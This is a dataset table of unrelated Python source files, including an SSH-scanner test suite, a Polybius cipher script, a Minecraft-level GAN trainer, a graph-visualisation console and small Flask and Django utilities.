id
stringlengths 3
8
| content
stringlengths 100
981k
|
|---|---|
60026
|
import json
import os
import shutil
import subprocess
import sys
import tempfile
import unittest
sys.path.append("../main")
from algorithms import *
port = 2222
def sshd(**kwargs):
dirname = tempfile.mkdtemp()
confname = dirname + "/sshd_config"
logname = dirname + "/sshd.log"
with open(confname, "w") as conf:
print("LogLevel", "DEBUG3", file=conf)
print("ListenAddress", "127.0.0.1:2222", file=conf)
for key, value in kwargs.items():
if type(value) == str:
print(key, value.replace("${confdir}", dirname), file=conf)
else:
for val in value:
print(key, val.replace("${confdir}", dirname), file=conf)
for f in os.listdir("./config"):
shutil.copy("./config/" + f, dirname)
if f.startswith("ssh_host_") and f.endswith("_key") and "HostKey" not in kwargs:
print("HostKey", dirname + "/" + f, file=conf)
return subprocess.Popen([
"/usr/sbin/sshd",
"-f", confname,
"-E", logname,
"-D",
])
def scan(*args):
scanner = subprocess.Popen(
[ "../main/scanner.py", "--json" ] + [ "--" + arg for arg in args ] + [ "127.0.0.1:2222" ],
stdout=subprocess.PIPE
)
( stdout, stderr ) = scanner.communicate()
if scanner.returncode == 0:
return json.loads(stdout.decode())
else:
return None
def what(result):
return [ issue["what"] for issue in result["issues"] ]
class TestScanner(unittest.TestCase):
def tearDown(self):
self.sshd.terminate()
def test_djb(self):
self.sshd = sshd(
KexAlgorithms=KEX_ECDH_CURVE25519_SHA256,
HostKey="${confdir}/ssh_host_ed25519_key",
Ciphers="<EMAIL>"
)
results = scan("algorithms")
self.assertEqual(len(results), 1)
for r in results:
self.assertEqual(r["host"], "127.0.0.1")
self.assertEqual(r["port"], 2222)
self.assertEqual(r["kex_init"]["kex_algorithms"], [ KEX_ECDH_CURVE25519_SHA256 ])
self.assertEqual(r["kex_init"]["server_host_key_algorithms"], [ "ssh-ed25519" ])
self.assertEqual(r["kex_init"]["encryption_algorithms_c2s"], [ "<EMAIL>" ])
self.assertEqual(r["kex_init"]["encryption_algorithms_s2c"], [ "<EMAIL>" ])
def test_nsa(self):
self.sshd = sshd(
KexAlgorithms=",".join([
KEX_ECDH_NISTP521_SHA512,
KEX_ECDH_NISTP384_SHA384,
KEX_ECDH_NISTP256_SHA256,
]),
HostKey=[
"${confdir}/ssh_host_ecdsa521_key",
"${confdir}/ssh_host_ecdsa384_key",
"${confdir}/ssh_host_ecdsa256_key",
],
Ciphers="<EMAIL>,<EMAIL>"
)
results = scan("algorithms", "details")
self.assertEqual(len(results), 1)
for r in results:
self.assertEqual(r["host"], "127.0.0.1")
self.assertEqual(r["port"], 2222)
self.assertEqual(
r["kex_init"]["kex_algorithms"],
[ KEX_ECDH_NISTP521_SHA512, KEX_ECDH_NISTP384_SHA384, KEX_ECDH_NISTP256_SHA256 ]
)
self.assertEqual(
r["kex_init"]["server_host_key_algorithms"],
[SIGN_ECDSA_NISTP521_SHA512,SIGN_ECDSA_NISTP384_SHA384,SIGN_ECDSA_NISTP256_SHA256]
)
self.assertEqual(
r["kex_init"]["encryption_algorithms_c2s"],
[ "<EMAIL>", "<EMAIL>" ]
)
self.assertEqual(
r["kex_init"]["encryption_algorithms_s2c"],
[ "<EMAIL>", "<EMAIL>" ]
)
self.assertTrue(any([ x == "Key exchange: unsafe elliptic curve" for x in what(r) ]))
self.assertTrue(any([ x == "Signature: requires per-signature entropy" for x in what(r) ]))
self.assertTrue(any([ x == "Signature: unsafe elliptic curve" for x in what(r) ]))
def test_old(self):
self.sshd = sshd(
KexAlgorithms=",".join([ KEX_DH_GROUP1_SHA1, KEX_DH_GROUP14_SHA1 ]),
HostKey=[ "${confdir}/ssh_host_rsa1024_key", "${confdir}/ssh_host_dsa_key" ],
HostKeyAlgorithms="ssh-rsa,ssh-dss",
Ciphers="3des-cbc,arcfour",
MACs="hmac-md5"
)
results = scan("algorithms", "instructions")
self.assertEqual(len(results), 1)
for r in results:
self.assertEqual(r["host"], "127.0.0.1")
self.assertEqual(r["port"], 2222)
self.assertEqual(
r["kex_init"]["kex_algorithms"],
[ KEX_DH_GROUP1_SHA1, KEX_DH_GROUP14_SHA1 ]
)
self.assertEqual(
r["kex_init"]["server_host_key_algorithms"],
[ SIGN_RSA_SHA1, SIGN_RSA_SHA512, SIGN_RSA_SHA256, SIGN_DSA ]
)
self.assertEqual(r["kex_init"]["encryption_algorithms_c2s"], [ "3des-cbc","arcfour" ])
self.assertEqual(r["kex_init"]["encryption_algorithms_s2c"], [ "3des-cbc","arcfour" ])
self.assertEqual(r["kex_init"]["mac_algorithms_c2s"], [ "hmac-md5" ])
self.assertEqual(r["kex_init"]["mac_algorithms_s2c"], [ "hmac-md5" ])
self.assertTrue(any([ x == "Key exchange: weak hash" for x in what(r) ]))
self.assertTrue(any([ x == "Key exchange: small DH group" for x in what(r) ]))
self.assertTrue(any([ x == "Signature: small key size" for x in what(r) ]))
self.assertTrue(any([ x == "Signature: requires per-signature entropy" for x in what(r) ]))
self.assertTrue(any([ x == "Cipher: small block size" for x in what(r) ]))
self.assertTrue(any([ x == "Authenticated encryption: CBC-and-MAC" for x in what(r) ]))
def test_classic(self):
self.sshd = sshd(
KexAlgorithms=",".join([ KEX_DH_GEX_SHA256 ]),
HostKey=[ "${confdir}/ssh_host_rsa2048_key" ],
Ciphers="aes256-ctr,aes192-ctr,aes128-ctr",
MACs="hmac-sha2-512-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-ripemd160-etm@openssh.com,umac-128-etm@openssh.com"
)
results = scan("algorithms", "details", "fast", "instructions")
self.assertEqual(len(results), 1)
for r in results:
self.assertEqual(r["host"], "127.0.0.1")
self.assertEqual(r["port"], 2222)
self.assertEqual(r["kex_init"]["kex_algorithms"], [ KEX_DH_GEX_SHA256 ])
self.assertEqual(
r["kex_init"]["server_host_key_algorithms"],
[ SIGN_RSA_SHA1, SIGN_RSA_SHA512, SIGN_RSA_SHA256 ]
)
self.assertEqual(
r["kex_init"]["encryption_algorithms_c2s"],
[ "aes256-ctr", "aes192-ctr", "aes128-ctr" ]
)
self.assertEqual(
r["kex_init"]["encryption_algorithms_s2c"],
[ "aes256-ctr", "aes192-ctr", "aes128-ctr" ]
)
self.assertEqual(
r["kex_init"]["mac_algorithms_c2s"],
[
"hmac-sha2-512-etm@openssh.com",
"hmac-sha2-256-etm@openssh.com",
"hmac-ripemd160-etm@openssh.com",
"umac-128-et<EMAIL>",
]
)
self.assertEqual(
r["kex_init"]["mac_algorithms_s2c"],
[
"hmac-sha2-512-etm@openssh.com",
"hmac-sha2-256-etm@openssh.com",
"hmac-ripemd160-etm@<EMAIL>",
"umac-<EMAIL>-<EMAIL>",
]
)
|
60042
|
from string import ascii_uppercase as alphabet
def codes_table(char):
table = {
"A": 11, "B": 21, "C": 31, "D": 41, "E": 51,
"F": 12, "G": 22, "H": 32, "I": 42, "K": 52,
"L": 13, "M": 23, "N": 33, "O": 43, "P": 53,
"Q": 14, "R": 24, "S": 34, "T": 44, "U": 54,
"V": 15, "W": 25, "X": 35, "Y": 45, "Z": 55, "J": 0,
11: "A", 21: "B", 31: "C", 41: "D", 51: "E",
12: "F", 22: "G", 32: "H", 42: "I", 52: "K",
13: "L", 23: "M", 33: "N", 43: "O", 53: "P",
14: "Q", 24: "R", 34: "S", 44: "T", 54: "U",
15: "V", 25: "W", 35: "X", 45: "Y", 55: "Z", 0: "J"
}
return table[char]
def encoding(text):
text, finished_text = text.upper(), ""
for symbol in text:
if symbol in alphabet:
finished_text += str(codes_table(symbol)) + " "
return finished_text
def decoding(text):
text, finished_text = text.upper(), ""
for symbol in list(map(int, text.split())):
finished_text += codes_table(symbol)
return finished_text
def assembly(mode):
text = str(input("[+] Enter your text - "))
if mode == 0:
finished_text = encoding(text)
else:
finished_text = decoding(text)
print("\n »» The result of encoding by Morse algorithm. ««")
print(finished_text)
def main():
print("[x] Polybius Square cryptography algorithm. [x]")
print(" • 0. Encoding mode.\n • 1. Decoding mode.")
mode = int(input("[?] Select program mode - "))
assembly(mode)
if __name__ == '__main__':
main()
|
60058
|
from pydantic import BaseModel, constr
def other_func(regex):
pass
class Model(BaseModel):
abc: str = other_func(regex='<caret>[^a-zA-Z]+')
|
60098
|
from pyecharts import options as opts
from pyecharts.charts import Scatter
from pyecharts.commons.utils import JsCode
from pyecharts.faker import Faker
c = (
Scatter()
.add_xaxis(Faker.choose())
.add_yaxis(
"商家A",
[list(z) for z in zip(Faker.values(), Faker.choose())],
label_opts=opts.LabelOpts(
formatter=JsCode(
"function(params){return params.value[1] +' : '+ params.value[2];}"
)
),
)
.set_global_opts(
title_opts=opts.TitleOpts(title="Scatter-多维度数据"),
tooltip_opts=opts.TooltipOpts(
formatter=JsCode(
"function (params) {return params.name + ' : ' + params.value[2];}"
)
),
visualmap_opts=opts.VisualMapOpts(
type_="color", max_=150, min_=20, dimension=1
),
)
.render("scatter_multi_dimension.html")
)
|
60106
|
from bluetooth_communication import AndroidAPI, AndroidThread, AndroidExploreRunThread
from pc_communication import PcThread, PcExploreRunThread
from serial_stub import SerialAPIStub
__author__ = 'Danyang'
if __name__=="__main__":
print "Executing main flow"
serial_api = SerialAPIStub()
android_api = AndroidAPI(serial_api)
android_thread = AndroidThread("android", android_api, mode="auto", production=True)
explore_run_thread = AndroidExploreRunThread("explore_run_bluetooth", android_thread.android_api)
pc_thread = PcThread("pc_thread", serial_api, android_api)
pc_explore_run_thread = PcExploreRunThread("explore_run_pc", pc_thread.pc_api)
android_thread.start()
explore_run_thread.start()
pc_thread.start()
pc_explore_run_thread.start()
|
60179
|
import os
import subprocess
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
from torch.nn.functional import interpolate
from loguru import logger
from tqdm import tqdm
import numpy as np
import wandb
from draw_concat import draw_concat
from generate_noise import generate_spatial_noise
from minecraft.level_utils import one_hot_to_blockdata_level, save_level_to_world, clear_empty_world
from minecraft.level_renderer import render_minecraft
from models import calc_gradient_penalty, save_networks
from utils import interpolate3D
def update_noise_amplitude(z_prev, real, opt):
""" Update the amplitude of the noise for the current scale according to the previous noise map. """
RMSE = torch.sqrt(F.mse_loss(real, z_prev))
return opt.noise_update * RMSE
def train_single_scale(D, G, reals, generators, noise_maps, input_from_prev_scale, noise_amplitudes, opt):
""" Train one scale. D and G are the current discriminator and generator, reals are the scaled versions of the
original level, generators and noise_maps contain information from previous scales and will receive information in
this scale, input_from_previous_scale holds the noise map and images from the previous scale, noise_amplitudes hold
the amplitudes for the noise in all the scales. opt is a namespace that holds all necessary parameters. """
current_scale = len(generators)
clear_empty_world(opt.output_dir, 'Curr_Empty_World') # reset tmp world
if opt.use_multiple_inputs:
real_group = []
nzx_group = []
nzy_group = []
nz_group = []
for scale_group in reals:
real_group.append(scale_group[current_scale])
nzx_group.append(scale_group[current_scale].shape[2])
nzy_group.append(scale_group[current_scale].shape[3])
nz_group.append((scale_group[current_scale].shape[2], scale_group[current_scale].shape[3]))
curr_noises = [0 for _ in range(len(real_group))]
curr_prevs = [0 for _ in range(len(real_group))]
curr_z_prevs = [0 for _ in range(len(real_group))]
else:
real = reals[current_scale]
nz = real.shape[2:]
padsize = int(1 * opt.num_layer) # As kernel size is always 3 currently, padsize goes up by one per layer
if not opt.pad_with_noise:
# pad_noise = nn.ConstantPad3d(padsize, 0)
# pad_image = nn.ConstantPad3d(padsize, 0)
pad_noise = nn.ReplicationPad3d(padsize)
pad_image = nn.ReplicationPad3d(padsize)
else:
pad_noise = nn.ReplicationPad3d(padsize)
pad_image = nn.ReplicationPad3d(padsize)
# setup optimizer
optimizerD = optim.Adam(D.parameters(), lr=opt.lr_d, betas=(opt.beta1, 0.999))
optimizerG = optim.Adam(G.parameters(), lr=opt.lr_g, betas=(opt.beta1, 0.999))
schedulerD = torch.optim.lr_scheduler.MultiStepLR(optimizer=optimizerD, milestones=[1600, 2500], gamma=opt.gamma)
schedulerG = torch.optim.lr_scheduler.MultiStepLR(optimizer=optimizerG, milestones=[1600, 2500], gamma=opt.gamma)
if current_scale == 0: # Generate new noise
if opt.use_multiple_inputs:
z_opt_group = []
for nzx, nzy in zip(nzx_group, nzy_group):
z_opt = generate_spatial_noise([1, opt.nc_current, nzx, nzy], device=opt.device)
z_opt = pad_noise(z_opt)
z_opt_group.append(z_opt)
else:
z_opt = generate_spatial_noise((1, opt.nc_current) + nz, device=opt.device)
z_opt = pad_noise(z_opt)
else: # Add noise to previous output
if opt.use_multiple_inputs:
z_opt_group = []
for nzx, nzy in zip(nzx_group, nzy_group):
z_opt = torch.zeros([1, opt.nc_current, nzx, nzy]).to(opt.device)
z_opt = pad_noise(z_opt)
z_opt_group.append(z_opt)
else:
z_opt = torch.zeros((1, opt.nc_current) + nz).to(opt.device)
z_opt = pad_noise(z_opt)
logger.info("Training at scale {}", current_scale)
grad_d_real = []
grad_d_fake = []
grad_g = []
for p in D.parameters():
grad_d_real.append(torch.zeros(p.shape).to(opt.device))
grad_d_fake.append(torch.zeros(p.shape).to(opt.device))
for p in G.parameters():
grad_g.append(torch.zeros(p.shape).to(opt.device))
for epoch in tqdm(range(opt.niter)):
step = current_scale * opt.niter + epoch
if opt.use_multiple_inputs:
group_steps = len(real_group)
noise_group = []
for nzx, nzy in zip(nzx_group, nzy_group):
noise_ = generate_spatial_noise([1, opt.nc_current, nzx, nzy], device=opt.device)
noise_ = pad_noise(noise_)
noise_group.append(noise_)
else:
group_steps = 1
noise_ = generate_spatial_noise((1, opt.nc_current) + nz, device=opt.device)
noise_ = pad_noise(noise_)
for curr_inp in range(group_steps):
if opt.use_multiple_inputs:
real = real_group[curr_inp]
nz = nz_group[curr_inp]
z_opt = z_opt_group[curr_inp]
noise_ = noise_group[curr_inp]
prev_scale_results = input_from_prev_scale[curr_inp]
opt.curr_inp = curr_inp
else:
prev_scale_results = input_from_prev_scale
############################
# (1) Update D network: maximize D(x) + D(G(z))
###########################
for j in range(opt.Dsteps):
# train with real
D.zero_grad()
output = D(real).to(opt.device)
errD_real = -output.mean()
errD_real.backward(retain_graph=True)
grads_after = []
cos_sim = []
for i, p in enumerate(D.parameters()):
grads_after.append(p.grad)
cos_sim.append(nn.CosineSimilarity(-1)(grad_d_real[i], p.grad).mean().item())
diff_d_real = np.mean(cos_sim)
grad_d_real = grads_after
# train with fake
if (j == 0) & (epoch == 0):
if current_scale == 0: # If we are in the lowest scale, noise is generated from scratch
prev = torch.zeros((1, opt.nc_current) + nz).to(opt.device)
prev_scale_results = prev
prev = pad_image(prev)
z_prev = torch.zeros((1, opt.nc_current) + nz).to(opt.device)
z_prev = pad_noise(z_prev)
opt.noise_amp = 1
else: # First step in NOT the lowest scale
# We need to adapt our inputs from the previous scale and add noise to it
prev = draw_concat(generators, noise_maps, reals, noise_amplitudes, prev_scale_results,
"rand", pad_noise, pad_image, opt)
prev = interpolate3D(prev, real.shape[-3:], mode="bilinear", align_corners=True)
prev = pad_image(prev)
z_prev = draw_concat(generators, noise_maps, reals, noise_amplitudes, prev_scale_results,
"rec", pad_noise, pad_image, opt)
z_prev = interpolate3D(z_prev, real.shape[-3:], mode="bilinear", align_corners=True)
opt.noise_amp = update_noise_amplitude(z_prev, real, opt)
z_prev = pad_image(z_prev)
else: # Any other step
if opt.use_multiple_inputs:
z_prev = curr_z_prevs[curr_inp]
prev = draw_concat(generators, noise_maps, reals, noise_amplitudes, prev_scale_results,
"rand", pad_noise, pad_image, opt)
prev = interpolate3D(prev, real.shape[-3:], mode="bilinear", align_corners=False)
prev = pad_image(prev)
# After creating our correct noise input, we feed it to the generator:
noise = opt.noise_amp * noise_ + prev
fake = G(noise.detach(), prev)
# Then run the result through the discriminator
output = D(fake.detach())
errD_fake = output.mean()
# Backpropagation
errD_fake.backward(retain_graph=False)
# Gradient Penalty
gradient_penalty = calc_gradient_penalty(D, real, fake, opt.lambda_grad, opt.device)
gradient_penalty.backward(retain_graph=False)
grads_after = []
cos_sim = []
for i, p in enumerate(D.parameters()):
grads_after.append(p.grad)
cos_sim.append(nn.CosineSimilarity(-1)(grad_d_fake[i], p.grad).mean().item())
diff_d_fake = np.mean(cos_sim)
grad_d_fake = grads_after
# Logging:
if step % 10 == 0:
wandb.log({f"D(G(z))@{current_scale}": errD_fake.item(),
f"D(x)@{current_scale}": -errD_real.item(),
f"gradient_penalty@{current_scale}": gradient_penalty.item(),
f"D_real_grad@{current_scale}": diff_d_real,
f"D_fake_grad@{current_scale}": diff_d_fake,
},
step=step, sync=False)
optimizerD.step()
if opt.use_multiple_inputs:
z_opt_group[curr_inp] = z_opt
input_from_prev_scale[curr_inp] = prev_scale_results
curr_noises[curr_inp] = noise
curr_prevs[curr_inp] = prev
curr_z_prevs[curr_inp] = z_prev
############################
# (2) Update G network: maximize D(G(z))
###########################
for j in range(opt.Gsteps):
G.zero_grad()
fake = G(noise.detach(), prev.detach(), temperature=1)
output = D(fake)
errG = -output.mean()
errG.backward(retain_graph=False)
grads_after = []
cos_sim = []
for i, p in enumerate(G.parameters()):
grads_after.append(p.grad)
cos_sim.append(nn.CosineSimilarity(-1)(grad_g[i], p.grad).mean().item())
diff_g = np.mean(cos_sim)
grad_g = grads_after
if opt.alpha != 0: # i. e. we are trying to find an exact recreation of our input in the lat space
Z_opt = opt.noise_amp * z_opt + z_prev
G_rec = G(Z_opt.detach(), z_prev, temperature=1)
rec_loss = opt.alpha * F.mse_loss(G_rec, real)
rec_loss.backward(retain_graph=False) # TODO: Check for unexpected argument retain_graph=True
rec_loss = rec_loss.detach()
else: # We are not trying to find an exact recreation
rec_loss = torch.zeros([])
Z_opt = z_opt
optimizerG.step()
# More Logging:
if step % 10 == 0:
wandb.log({f"noise_amplitude@{current_scale}": opt.noise_amp,
f"rec_loss@{current_scale}": rec_loss.item(),
f"G_grad@{current_scale}": diff_g},
step=step, sync=False, commit=True)
# Rendering and logging images of levels
if epoch % 500 == 0 or epoch == (opt.niter - 1):
token_list = opt.token_list
to_level = one_hot_to_blockdata_level
try:
subprocess.call(["wine", '--version'])
real_scaled = to_level(real.detach(), token_list, opt.block2repr, opt.repr_type)
# Minecraft World
worldname = 'Curr_Empty_World'
clear_empty_world(opt.output_dir, worldname) # reset tmp world
to_render = [real_scaled, to_level(fake.detach(), token_list, opt.block2repr, opt.repr_type),
to_level(G(Z_opt.detach(), z_prev), token_list, opt.block2repr, opt.repr_type)]
render_names = [f"real@{current_scale}", f"G(z)@{current_scale}", f"G(z_opt)@{current_scale}"]
obj_pth = os.path.join(opt.out_, f"objects/{current_scale}")
os.makedirs(obj_pth, exist_ok=True)
for n, level in enumerate(to_render):
pos = n * (level.shape[0] + 5)
save_level_to_world(opt.output_dir, worldname, (pos, 0, 0), level, token_list, opt.props)
curr_coords = [[pos, pos + real_scaled.shape[0]],
[0, real_scaled.shape[1]],
[0, real_scaled.shape[2]]]
render_pth = render_minecraft(worldname, curr_coords, obj_pth, render_names[n])
wandb.log({render_names[n]: wandb.Object3D(open(render_pth))}, commit=False)
except OSError:
pass
# Learning Rate scheduler step
schedulerD.step()
schedulerG.step()
# Save networks
if opt.use_multiple_inputs:
z_opt = z_opt_group
torch.save(z_opt, "%s/z_opt.pth" % opt.outf)
save_networks(G, D, z_opt, opt)
wandb.save(opt.outf)
return z_opt, input_from_prev_scale, G
|
60223
|
from __future__ import print_function
import os.path
from googleapiclient.discovery import build
from google_auth_oauthlib.flow import InstalledAppFlow
from google.auth.transport.requests import Request
from google.oauth2.credentials import Credentials
import sys
import json
SCOPES = ['https://www.googleapis.com/auth/drive','https://www.googleapis.com/auth/drive.file']
def delete_file(file_id):
creds = None
# The file token.json stores the user's access and refresh tokens, and is
# created automatically when the authorization flow completes for the first
# time.
if os.path.exists('./creds/token.json'):
creds = Credentials.from_authorized_user_file('./creds/token.json', SCOPES)
# If there are no (valid) credentials available, let the user log in.
# if this file isnt there this may be a heroku instance
elif os.path.exists('/app/google-credentials.json'):
creds = Credentials.from_authorized_user_file('/app/google-credentials.json', SCOPES)
else:
print("Please run upload upload.py before using it!!!")
sys.exit(1)
service = build('drive', 'v3', credentials=creds)
try:
service.files().delete(fileId = file_id).execute()
return 0
except:
print("ERROR, file didnt get deleted")
return 1
|
60247
|
class Leapx_org():
mul_num = 1.20
mul_num2 = 1.30
def __init__(self,first,last,pay):
self.f_name = first
self.l_name = last
self.pay_amt = pay
self.full_name = first+" "+last
@staticmethod
def check_amt(amt):
if amt <50000:
return True
else :
return False
def incrementpay(self):
if self.check_amt(self.pay_amt):
self.pay_amt = int(self.pay_amt*self.mul_num2)
else :
self.pay_amt = int(self.pay_amt*self.mul_num)
return self.pay_amt
L_obj1 = Leapx_org('mohit', 'RAJ', 40000)
L_obj2 = Leapx_org('Ravender', 'Dahiya',70000)
L_obj1.incrementpay()
L_obj2.incrementpay()
print L_obj1.pay_amt
print L_obj2.pay_amt
|
60262
|
from pathlib import Path
from .build import DocBuilder
def finalize_builddir(repo_name):
'Bookkeeping on the docs build directory'
root = Path('_build') / repo_name
with open(root / '.nojekyll', 'w') as fh:
fh.write('')
def build_root(repo_name):
'''Build the top-level documentation.
See :py:mod:`.build` on building sub-projects.
'''
with DocBuilder(repo_name, '.') as builder:
builder.build()
|
60337
|
import script
from script import *
import shlex
import edition
import layout
import query
import player
import test
import graph
import opendns
class Color(script.Script):
def __init__(self, console):
super(Color, self).__init__(console)
self.colors = {
"red" : [ 1.0, 0.0, 0.0, 1.0 ],
"green" : [ 0.0, 1.0, 0.0, 1.0 ],
"blue" : [ 0.0, 0.0, 1.0, 1.0 ],
"yellow" : [ 1.0, 1.0, 0.0, 1.0 ],
"cyan" : [ 0.0, 1.0, 1.0, 1.0 ],
"magenta" : [ 1.0, 0.0, 1.0, 1.0 ],
"white" : [ 1.0, 1.0, 1.0, 1.0 ],
"gray" : [ 0.5, 0.5, 0.5, 1.0 ],
"black" : [ 0.0, 0.0, 0.0, 1.0 ],
"orange" : [ 1.0, 0.4, 0.0, 1.0 ],
"purple" : [ 0.5, 0, 0.5, 1.0],
"pink" : [ 1.0, 0.75, 0.79, 1.0 ],
"brown" : [ 0.64, 0.16, 0.16, 1.0 ]
}
self.color_map = None
self.color_masks = {
"rgba" : [ True, True, True, True ],
"rgb" : [ True, True, True, False ],
"alpha" : [ False, False, False, True ]
}
def random_color(self):
return [ random.random(), random.random(), random.random(), 1.0 ]
def parse_color(self, s):
if s in self.colors:
return std.vec4_to_str(self.colors[s])
else:
return std.vec4_to_str(self.colors["black"])
def lambda_assign(self, element_type, element_id, color):
if element_type == "node":
og.set_node_attribute(element_id, "og:space:color", "vec4", color)
elif element_type == "edge":
og.set_edge_attribute(element_id, "og:space:color", "vec4", color)
def lambda_by(self, element_type, element_id, attr, color_map):
if element_type not in color_map:
color_map[element_type] = dict()
if element_type == "node":
value = og.get_node_attribute(element_id, attr)
elif element_type == "edge":
value = og.get_edge_attribute(element_id, attr)
if value is None:
color = std.vec4_to_str(self.colors["gray"])
else:
value = "{0}".format(value)
if value not in color_map[element_type]:
color_map[element_type][value] = self.random_color()
color = std.vec4_to_str(color_map[element_type][value])
if element_type == "node":
og.set_node_attribute(element_id, "og:space:color", "vec4", color)
elif element_type == "edge":
og.set_edge_attribute(element_id, "og:space:color", "vec4", color)
def lambda_op(self, element_type, element_id, op, color_mask, factor):
def calculate(op, v1, v2, mask):
if op == "add":
r = [ v1[i] + v2[i] for i in xrange(4) ]
elif op == "sub":
r = [ v1[i] - v2[i] for i in xrange(4) ]
elif op == "mul":
r = [ v1[i] * v2[i] for i in xrange(4) ]
elif op == "div":
r = [ v1[i] / v2[i] for i in xrange(4) ]
elif op == "set":
r = v2
else:
self.console.log("Error: '{0}': Unknown operator!")
return
for i in xrange(4):
if not mask[i]:
r[i] = v1[i]
return r
if element_type == "node":
color = og.get_node_attribute(element_id, "og:space:color")
og.set_node_attribute(element_id, "og:space:color", "vec4", std.vec4_to_str(calculate(op, color, factor, color_mask)))
elif element_type == "edge":
color = og.get_edge_attribute(element_id, "og:space:color1")
og.set_edge_attribute(element_id, "og:space:color1", "vec4", std.vec4_to_str(calculate(op, color, factor, color_mask)))
color = og.get_edge_attribute(element_id, "og:space:color2")
og.set_edge_attribute(element_id, "og:space:color2", "vec4", std.vec4_to_str(calculate(op, color, factor, color_mask)))
def run(self, args):
query = self.console.query
if query is None:
self.console.log("Error: Query is empty!")
return
if len(args) == 2:
color = self.parse_color(args[1])
if 'nodes' in query:
[ self.lambda_assign("node", nid, color) for nid in query['nodes'] ]
if 'edges' in query:
[ self.lambda_assign("edge", eid, color) for eid in query['edges'] ]
elif len(args) == 3 and args[1] == "by":
attr = args[2]
color_map = dict()
if 'nodes' in query:
[ self.lambda_by("node", nid, attr, color_map) for nid in query['nodes'] ]
if 'edges' in query:
[ self.lambda_by("edge", eid, attr, color_map) for eid in query['edges'] ]
elif len(args) >= 4 and args[1] in [ "mul", "div", "add", "sub", "set" ]:
if args[2] not in self.color_masks:
self.console.log("Error: '{0}': Unknown color mask!".format(args[2]))
return
array = [ float(i) for i in " ".join(args[3:]).split() ]
if len(array) == 1:
factor = [ array[0], array[0], array[0], array[0] ]
elif len(array) == 3:
factor = [ array[0], array[1], array[2], 1.0 ]
elif len(array) == 4:
factor = [ array[0], array[1], array[2], array[3] ]
else:
self.console.log("Error: Can't parse color factor!")
return
if 'nodes' in query:
[ self.lambda_op("node", nid, args[1], self.color_masks[args[2]], factor) for nid in query['nodes'] ]
if 'edges' in query:
[ self.lambda_op("edge", eid, args[1], self.color_masks[args[2]], factor) for eid in query['edges'] ]
class Help(script.Script):
def __init__(self, console):
super(Help, self).__init__(console)
def run(self, args):
self.console.log("Avalailable commands:")
self.console.log(", ".join(self.console.context['scripts'].keys()))
class Quit(script.Script):
def __init__(self, console):
super(Quit, self).__init__(console)
def run(self, args):
self.console.log("Terminating OpenGraphiti...")
og.quit()
class Native(script.Script):
def __init__(self, console):
super(Native, self).__init__(console)
def run(self, args):
exec(" ".join(args[1:]))
# ----- Callbacks -----
class OpenGraphiti(object):
def __init__(self):
self.ids = {
"node" : og.get_node_ids,
"edge" : og.get_edge_ids
}
self.setters = {
"graph" : og.set_attribute,
"node" : og.set_node_attribute,
"edge" : og.set_edge_attribute,
}
self.getters = {
"graph" : og.get_attribute,
"node" : og.get_node_attribute,
"edge" : og.get_edge_attribute,
}
def get_ids(self, entity_type):
if entity_type in self.ids:
return self.ids[entity_type]()
raise Exception("{0}: Unknown entity type!".format(entity_type))
def set_attribute(self, entity_type, entity_id, attr_name, attr_type, attr_value):
if entity_type in self.setters:
return self.setters[entity_type](entity_id, attr_name, attr_type, attr_value)
raise Exception("{0}: Unknown entity type!".format(entity_type))
def get_attribute(self, entity_type, entity_id, attr_name):
if entity_type in self.getters:
return self.getters[entity_type](entity_id, attr_name)
raise Exception("{0}: Unknown entity type!".format(entity_type))
class Console(object):
def __init__(self):
self.context = {
"scripts" : {
"info" : edition.Info(self),
"load" : edition.Load(self),
"save" : edition.Save(self),
"screenshot" : edition.Screenshot(self),
"set" : edition.Set(self),
"get" : edition.Get(self),
"remove" : edition.Remove(self),
"map" : edition.Map(self),
"clear" : edition.Clear(self),
"select" : query.Select(self),
"filter" : query.Filter(self),
"query" : query.Query(self),
"layout" : layout.Layout(self),
"play" : player.Play(self),
"stop" : player.Stop(self),
"topo" : graph.Topology(self),
"test" : test.Test(self),
"help" : Help(self),
"color" : Color(self),
"quit" : Quit(self),
"opendns" : opendns.OpenDNS(self),
"py" : Native(self)
}
}
self.query = dict()
self.api = OpenGraphiti()
def log(self, text):
og.console({ 'log' : text })
def print_query(self):
s = "Entities: "
key_count = 0
for key in self.query.keys():
if key_count > 0:
s += ", "
s += "#{0}={1}".format(key, len(self.query[key]))
key_count += 1
self.log(s)
def execute(self, command):
lex = shlex.shlex(command, posix=True)
lex.whitespace_split = True
args = list(lex)
if 'scripts' in self.context and args[0] in self.context['scripts']:
self.context['scripts'][args[0]].run(args)
else:
# TODO: og.console("{0}: Command not found!".format(args[0]))
self.log("{0}: Command not found!".format(args[0]))
|
60344
|
from sklearn.base import BaseEstimator
import yake
from ._prep import TextPrep
class YakeTextPrep(TextPrep, BaseEstimator):
"""
Remove all text except meaningful key-phrases. Uses [yake](https://github.com/LIAAD/yake).
Arguments:
top_n: number of key-phrases to select
unique: only return unique keywords from the key-phrases
Usage:
```python
from tokenwiser.textprep import YakeTextPrep
text = ["Sources tell us that Google is acquiring Kaggle, a platform that hosts data science and machine learning"]
example = YakeTextPrep(top_n=3, unique=False).transform(text)
assert example[0] == 'hosts data science acquiring kaggle google is acquiring'
```
"""
def __init__(self, top_n: int = 5, unique: bool = False):
self.top_n = top_n
self.unique = unique
self.extractor = yake.KeywordExtractor(top=self.top_n)
def encode_single(self, text):
texts = " ".join([t[0] for t in self.extractor.extract_keywords(text)])
if not self.unique:
return texts
return " ".join(set(texts.split(" ")))
|
60352
|
from flask import Blueprint
from ctflorals.controllers import HomeController
from ctflorals.controllers import AboutController
from ctflorals.controllers import GalleryController
from ctflorals.controllers import TestimonialsController
ctflorals = Blueprint('ctflorals', __name__,
template_folder='views',
static_folder='../resources')
@ctflorals.route("/")
def home():
return HomeController().index()
@ctflorals.route("/about/")
def about():
return AboutController().index()
@ctflorals.route("/gallery/")
def gallery():
return GalleryController().index()
@ctflorals.route("/testimonials/")
def testimonials():
return TestimonialsController().index()
|
60357
|
from django.core.management.base import BaseCommand
from orcamentos.crm.models import Employee
class Command(BaseCommand):
help = ''' Cria um usuário admin. '''
def handle(self, *args, **kwargs):
'''
Cria um Employee.
Precisamos de Employee para fazer todas as transações no sistema.
'''
username = 'admin'
first_name = 'Admin'
last_name = 'Admin'
email = '<EMAIL>'
user = Employee.objects.create(
username=username,
first_name=first_name,
last_name=last_name,
email=email,
gender='I'
)
user.set_password('<PASSWORD>')
user.is_staff = True
user.is_superuser = True
